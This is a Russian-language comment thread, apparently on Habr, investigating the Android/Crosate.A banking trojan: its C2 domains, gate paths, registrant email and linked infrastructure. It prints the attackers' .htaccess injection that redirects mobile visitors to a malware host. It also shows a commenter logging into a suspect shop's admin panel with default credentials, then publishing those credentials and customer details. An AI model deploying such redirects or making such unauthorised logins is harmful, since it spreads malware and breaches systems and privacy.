Pull to refresh

Comments 71

Тут 2 варианта: либо вирус «китайского происхождения», либо ошибка кодировки. Думаю, пока рано делать выводы.

Возможно, что это такая обфускация.
Так же рекомендую параллельно использовать Fern Flower.
Возможно, т.к. полностью не получилось восстановить код, не могу с уверенностью что то сказать, можно посмотреть «Класс расшифровки» сверху.
Что-то слишком грустно звучит «Не устанавливайте root и банк-клиент на одно устройство»

Как я понимаю, если зловред объявился, есть возможность этот момент контролировать через «Разрешения суперпользователя»?
Так-то устанавливаемые приложения под контролем, но мало ли
его не удалить через стандартный менеджер приложений андроида, он выключает кнопки остановить и удалить. И не просит рут прав, просто падает когда кликаем на .apk. После он уже свое делает.
Вы меня немного не так поняли =)
Я про общую картину: практически любой зловред, использующий рут, может быть обнаружен стандартными средствами?
а что вы имеете ввиду под стандартными методами? )
Под стандартными я имел ввиду приложение Superuser, стоящее практически на всех рутованных устройствах, в котором можно контролировать все приложения, требующие root-права
он был, но например 4.1.1 на телефоне он спросил хочешь дать права, на планшете он байпаснул как то
То есть, на телефоне еще была возможность предотвратить «вторжение» на этом уровне?
Насчет планшета: может есть различия в настройках безопасности?

Судя по всему, не так всё и плохо может быть с рутованными устройствами
Извиняюсь за назойливость, просто не могу понять такого ажиотажа вокруг безопасности устройств с root-ом.
Ведь можно обеспечить должный уровень безопасности, если правильно им пользоваться, а не направо и налево раздавать права и разрешения
минимальное — использовать хоть какой то нормальный антивирус для мобилы и таба. Я пока что не знаю почему и как он обходил, думаю в будущем разберемся, напишу новую статью. Не надо извинений ) рад ответить на вопросы )
Насчет антивируса, по-моему, тоже спорный момент =)
А так, думаете, что контроль root-разрешений и отключение установки приложений из неизвестных источников не могут обеспечить должный уровень безопасности?
У меня, кстати, на выдачу root прав пароль стоит, чтобы не выдать их случайным нажатием на всплывшее окно, а в обычном состоянии root отключен
согласен, тоже вариант =)
UFO just landed and posted this here
теоретически нет. Примерный кейс:
Получаем рут права.
Добавляем в систему свой бинарник для рута.
Удаляем данные у SuperSu (или аналога).
Просто, для примера, начиная с 9-й версии CyanogenMod появился пункт в настройках, позволяющий отключать root как для приложений, так и для ADB.
Вот и задаюсь вопросом, насколько это может быть безопасно против зловредов
Пробежал http сканнером, нашел стату и админку:

abra-k0dabra.com/magic/stat.php
abra-k0dabra.com/magic/control

Далее погуглил по строке KeyHttpGate (http://avtesterr.com/venussa/gate.php содержит строку «KeyHttpGate abra-k0dabra.com/magic/gate.php» — видимо это механизм смены гейта),
нашел док.
Там указано имя малвари — Android/Crosate.A

Нашел несколько сандбокс анализов подобного, с 2013 года:
www.apk-analyzer.net/analysis/2683/13582/0/html
www.apk-analyzer.net/analysis/2230/11392/0/html
www.apk-analyzer.net/analysis/718/3954/0/html

Гейты малвари в .ru зоне, что не исключает «русский» след в самом начале жизни этого софта — тестили.

В этом пдфе немного описано про детект эмулятора в этой малвари.

Вот скан VT, тоже за 2013 год:
www.virustotal.com/en/file/964f6c1913c8f090cbcabb0f23d26e0a89408c1f2dda43a087159463bb3e07e7/analysis

Тут инфа посвежее:
malvertising.stopmalwares.com/2015/03/malvertising-androidsvpeng-androidcrosate-androiddeng
www.virustotal.com/en/file/324357f628d534eeae1674e6c3af9f3d4fad3e0dda5bc3fb782f1ed3b9a37dd8/analysis
abra-k0dabra.com/magic/stat.php
abra-k0dabra.com/magic/control

мы тоже находили, но дальше не ходили…
Регнул один из старых доменов private-area.ru, на которых был gate.php, просмотрим, стучит ли ещё кто туда
По инфе с VT этом же сервере есть домен heibe-titten.com
Там PMA: heibe-titten.com/phpMyAdmin и гейт heibe-titten.com/dnr/gate.php
Домен регнут на armyawka@inbox.ru — секретный вопрос «Модель Вашей первой машины», на это же мыло регнуты:

abra-k0dabra.com	[ 62.210.83.135 ]
anonyzmus.com		[ 62.210.78.48 ]
casino-ambassador.com	[ 62.210.86.232 ]
casino-olymnpic.com	[ 62.210.86.233 ]
esset-nod32.com		[ 178.33.225.144 ]
heibe-titten.com	[ 62.210.83.135 ]
jerking0ff.com		[ 62.210.244.63 ]
mego-bankasi.com	[ 37.187.138.222 ]
porabowenie.com		[ 62.210.244.63 ]
shortdomein.com		[ 62.210.78.19 ]
venuss-pizdenus.com	[ 62.210.244.71 ]

megogo-porn.com		[ не резолвится ]
megooshop.net		[ не резолвится ]
orgazm-girls.com	[ не резолвится ]
porno2000allin.com	[ не резолвится ]
privatbang.com		[ не резолвится ]
v-rozetke.com		[ не резолвится ]
girls-porno.net		[ не резолвится ]

да, русский след на глаз…

Спасибо за дополнение.
если на секретный вопрос подойдет «ВАЗ 2121», то и к гадалке ходить не надо…
Идём дальше.

Нашел через гугление полей домена нашел ещё один интересный домен, регнутый на armyawka@inbox.ru — apple-sh0p.com, IP: 37.252.0.192
на сайте указан номер: +7 (800) 100-22-69
CMS webassyst, по урлу 37.252.0.192 доступна админка.

Классика!
Логин-пароль admin:admin

Смотрим первый заказы в базе:

Заказ создан: 25 января 2015 10:08
Витрина: apple-sh0p.com
IP-адрес: 92.244.135.215 — Сербия

Скачиваем лог установки, находим путь на диске разработчика сайта: «D:\\Programs\\OpenServer\\domains\\shop-script.loc\\»
В общем-то реквизиты с сайта ведут на разработчика малвари или человека, с ним связанного, и судя по содержимому магазина — товар скарженный. Источник кредитных карт — вполне вероятно та самая малварь.
Мдя, пароль тут же сменили)
видимо чуваки с паяльниками уже доехали )
504 Gateway Time-out
nginx/1.7.0

Самое интересное, что такая реакция лишь доказывает то, что след был верным.
Через 10 минут после публикации доступов admin:admin они были изменены(тут я допускаю возможность смены аноном с хабра), но то, что сервер выключили, уже второй аргумент в пользу того, что шоп apple-sh0p.com аффилирован с малварей Android/Crosate.
Исходя из моей подготовки и опыта:), могу утверждать с высокой долей вероятности, что идентификация кардера упирается в запросе информации о вышеуказанных ключах через UNITPAY и уточнению владельца номера +7 (800) 100-22-69.
Я не отрицаю ничего, но это также может значить, что на сайт вломились анонимы с хабра и начали его ломать. Вот его и выключили.
Конечно может, но там внизу у хабраюзера receiver есть данные на покупателя обфускатора, и если обе ниточки сойдутся, то тут уже не отвертеться
Такая защита — это результат работы одной из версий нашего продукта DexProtector, к сожалению, иногда, среди наших хороших клиентов, попадаются злые негодяи, которые во-первых портят себе карму и вредят пользователям Android, а во вторых приводят к false positive антивирусов для нормальных защищенных приложений, соответственно, вредят и нам. Если не сложно, можете прислать нам этот apk, для того чтобы мы разобрались с этим нехорошим человеком?

Спасибо за пост.
Чувака нашли, бригада с паяльниками выехала :-)
А у Вас криптор-обфускатор водяные знаки вставляет с идентификатором покупателя?
Мы вынуждены вставлять водяные знаки, как раз из-за таких случаев, чтобы иметь возможность блокировать лицензию.
Это нормально, отслеживание судьбы купленной лицензии вполне себе верный ход. А как вы блокировать будете? Сам криптор онлайн или программа при каждом запуске в сеть идёт?
Если не секрет, то по каким следам нашли? Жёлтые точки?
Кстати, в этом случае я даже за, если знаете только вы и «честно-честно» только вы.
(комменты пиши @ страницу не обновляй)
что за «желтые точки»???
вот интересно ведь, но не понятно. У вас какой-то междусобойчик
Надеюсь, о результатах этой истории хотя бы в комментариях отпишитесь? Заинтриговали =)
«По предварительным данным, сумма предотвращенного ущерба составляет более 50 миллионов рублей.»

Интересно, автору статьи хотябы «спасибо» сказали?
это не тот вирус, название вируса который я исследовал и вируса который использовался не совпадают.
Спасибо автору за рассказ об инструментах. Как раз есть желание поковырять одно приложение =)
А может ещё кто-то знает про написание приложений на mono (тот что открытый .net)? Судя пл всему интересующее меня приложение его использует.
Тут 2 варианта: либо вирус «китайского происхождения», либо ошибка кодировки. Думаю, пока рано делать выводы.

Там дикая смесь из корейских и китайских иероглифов + еще какая-то фигня. Так что происхождение здесь точно не причем.
Выяснили же, что это результат работы обфускатора со строками — строки заворачиваются в вызов функции, и инлайном передаётся зашифрованная строка в формате \uXXXX\uXXXX\uXXXX\uXXXX\uXXXX\uXXXX\uXXXX\uXXXX
JD-GUI такие строки пытается сразу привести к символу, и в итоге видим иероглифы.
Я вот только одного не понял, как оно установилось то? Может упущенны какие-то подробности установки?

| заметите, он меня не спросил: «Ты согласен установить это приложение? Оно будет использовать такие-то права.»
просто кликаешь на apk и все, он уже установлен
Установлен ли «Unknown sources», есть ли права root, контролируется ли предоставление привилегий?
Если на все вопросы ответ нет, тогда уязвимость сосвсем в другом и уже нужно подумать о безопасности самой системы?
P.S. Какая версия android стояла?
1. да рут на системе есть + Unknown sources, возможно как то Genymotion сглупил… почему бы и нет, вполне возможно… хотя андроид в одном случае спросил хочешь дать ему рут в другом нет, разные эмуляторы…
2. мне хотелось больше всего понять для чего он нужен, для кражи смс, банковский или…
Комменты оказались не менее интересны чем статья. Целый детектив.
Пил кофе и с большим интересом читал.

Спасибо.
Не хватает только комментариев от авторов трояна в духе:

— Они за нами выехали
— Они больше не будут
— Они пили кофе, с интересом читали и отключали сервера
— Они уже пакуют чемоданы
— Оказалось, что паяльник очень горячий

(нужное подчеркнуть)
Это ещё не всё — я регнул один из старых доменов private-area.ru и на данный момент зафиксировал за 8 часов обращения ботов со 1240 IP адресов, раскиданных по миру.
Как соберу немного статистики, допишу в этот пост.
На данный момент собраны обращения к файлам:

/arigwfjlet.lui
/canada/gate.php
/china/gate.php
/estonia/gate.php
/evbkjnucvg.xky
/fkcdweleaj.xcz
/greatwall/gate.php
/israel/gate.php
/japan/gate.php
/kmepukizmy.qyx
/new/usb.php
/oxiqimfegl.swo
/plvkmxoeuc.vut
/reich/die_antwoord.php
/ugvodldbcl.ont
/vietnam/gate.php
/xkey/xtrapay.php
/ykey/xtrapay.php
/zkey/xpay.php
/zkey/xtrapay.php
Вы бы поаккуратнее с такими регистрациями. Понятно, что дело интересное. Но сейчас создателей вируса взяли и начнут собирать доказательства по этому делу, а там домены из их пачки зарегистрированные на Вас. Может не очень приятная ситуация получиться.
А ничего, что история владения доменом публично доступна и предыдущего владельца найти не проблема?
Да и новый владелец как бы не несёт ответственности за то, что ранее делали с этим доменом, пусть сначала докажут
Доказывать это — приятного мало.
Спасибо за предупреждение. Именно для этого я повесил сразу информационную заглушку на все запросы. Надеюсь органы обладают компитентностью)
Домен private-area.ru также участвовал в 2013 году во взломе форумов на VB.
Злоумышленники добавляли на сайты следующий код в .htaccess:

#########rataman##########
RewriteEngine on

RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} (mini\ 9.5|vx1000|lge\ |m800|e860|u940|ux840|compal|wireless|\ mobi|ahong|lg380|lgku|lgu900|lg210|lg47|lg920|lg840|lg370|sam-r|mg50|s55|g83|t66|vx400|mk99|d615|d763|el370|sl900|mp500|samu3|samu4|vx10|xda_|samu5|samu6|samu7|samu9|a615|b832|m881|s920|n210|s700|c-810|_h797|mob-x|sk16d|848b|mowser|s580|r800|471x|v120|rim8|c500foma:|160x|x160|480x|x640|t503|w839|i250|sprint|w398samr810|m5252|c7100|mt126|x225|s5330|s820|htil-g1|fly\ v71|s302|-x113|novarra|k610i|-three|8325rc|8352rc|sanyo|vx54|c888|nx250|n120|mtk\ |c5588|s710|t880|c5005|i;458x|p404i|s210|c5100|teleca|s940|c500|s590|foma|samsu|vx8|vx9|a1000|_mms|myx|a700|gu1100|bc831|e300|ems100|me701|me702m-three|sd588|s800|8325rc|ac831|mw200|brew\ |d88|htc\/|htc_touch|355x|m50|km100|d736|p-9521|telco|sl74|ktouch|m4u\/|me702|8325rc|kddi|phone|lg\ |sonyericsson|samsung|240x|x320|vx10|nokia|sony\ cmd|motorola|up.browser|up.link|mmp|symbian|smartphone|midp|wap|vodafone|o2|pocket|mobile|treo) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^(1207|3gso|4thp|501i|502i|503i|504i|505i|506i|6310|6590|770s|802s|a\ wa|acer|acs-|airn|alav|asus|attw|au-m|aur\ |aus\ |abac|acoo|aiko|alco|alca|amoi|anex|anny|anyw|aptu|arch|argo|bell|bird|bw-n|bw-u|beck|benq|bilb|blac|c55\/|cdm-|chtm|capi|cond|craw|dall|dbte|dc-s|dica|ds-d|ds12|dait|devi|dmob|doco|dopo|el49|erk0|esl8|ez40|ez60|ez70|ezos|ezze|elai|emul|eric|ezwa|fake|fly-|fly_|g-mo|g1\ u|g560|gf-5|grun|gene|go\.w|good|grad|hcit|hd-m|hd-p|hd-t|hei-|hp\ i|hpip|hs-c|htc\ |htc-|htca|htcg|htcp|htcs|htct|htc_|haie|hita|huaw|hutc|i-20|i-go|i-ma|i230|iac|iac-|iac\/|ig01|im1k|inno|iris|jata|java|kddi|kgt|kgt\/|kpt\ |kwc-|klon|lexi|lg\ g|lg-a|lg-b|lg-c|lg-d|lg-f|lg-g|lg-k|lg-l|lg-m|lg-o|lg-p|lg-s|lg-t|lg-u|lg-w|lg\/k|lg\/l|lg\/u|lg50|lg54|lge-|lge\/|lynx|leno|m1-w|m3ga|m50\/|maui|mc01|mc21|mcca|medi|meri|mio8|mioa|mo01|mo02|mode|modo|mot\ |mot-|mt50|mtp1|mtv\ |mate|maxo|merc|mits|mobi|motv|mozz|n100|n101|n102|n202|n203|n300|n302|n500|n502|n505|n700|n701|n710|nec-|nem-|newg|neon|netf|noki|nzph|o2\ x|o2-x|opwv|owg1|opti|oran|p800|pand|pg-1|pg-2|pg-3|pg-6|pg-8|pg-c|pg13|phil|pn-2|pt-g|palm|pana|pire|pock|pose|psio|qa-a|qc-2|qc-3|qc-5|qc-7|qc07|qc12|qc21|qc32|qc60|qci-|qwap|qtek|r380|r600|raks|rim9|rove|s55\/|sage|sams|sc01|sch-|scp-|sdk\/|se47|sec-|sec0|sec1|semc|sgh-|shar|sie-|sk-0|sl45|slid|smb3|smt5|sp01|sph-|spv\ |spv-|sy01|samm|sany|sava|scoo|send|siem|smar|smit|soft|sony|t-mo|t218|t250|t600|t610|t618|tcl-|tdg-|telm|tim-|ts70|tsm-|tsm3|tsm5|tx-9|tagt|talk|teli|topl|hiba|up\.b|upg1|utst|v400|v750|veri|vk-v|vk40|vk50|vk52|vk53|vm40|vx98|virg|vite|voda|vulc|w3c\ |w3c-|wapj|wapp|wapu|wapm|wig\ |wapi|wapr|wapv|wapy|wapa|waps|wapt|winc|winw|wonu|x700|xda2|xdag|yas-|your|zte-|zeto|acs-|alav|alca|amoi|aste|audi|avan|benq|bird|blac|blaz|brew|brvw|bumb|ccwa|cell|cldc|cmd-|dang|doco|eml2|eric|fetc|hipt|http|ibro|idea|ikom|inno|ipaq|jbro|jemu|java|jigs|kddi|keji|kyoc|kyok|leno|lg-c|lg-d|lg-g|lge-|libw|m-cr|maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|mywa|nec-|newt|nok6|noki|o2im|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|rozo|sage|sama|sams|sany|sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo|teli|tim-|tosh|treo|tsm-|upg1|upsi|vk-v|voda|vx52|vx53|vx60|vx61|vx70|vx80|vx81|vx83|vx85|wap-|wapa|wapi|wapp|wapr|webc|whit|winw|wmlb|xda-) [NC,OR]
RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
RewriteCond %{HTTP:Profile} .+ [NC,OR]
RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]

RewriteCond %{QUERY_STRING} !wpc_nr [NC]
RewriteCond %{HTTP_USER_AGENT} !(iphone|ipad|ipod|iphone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]

RewriteRule ^(.*)$ http://private-area.ru/retro/ [L,R=302]
#########!rataman!#########

Видимо взлом форумов был первичным источником трафика для Android/Crosate.A, мобильный трафик со сломанных сайтов пересылался на private-area.ru, далее какой-либо фейк обновления флеш-плеера, и дальше малварь попадала к пользователям на устройство.
А как пришли к выводу, что это именно те, а не другие?
Я только по svpeng/crossate ориентируюсь, хотя да, малварь одного семейства может десяток мелких самостоятельных группировок использовать.
Only those users with full accounts are able to leave comments. Log in, please.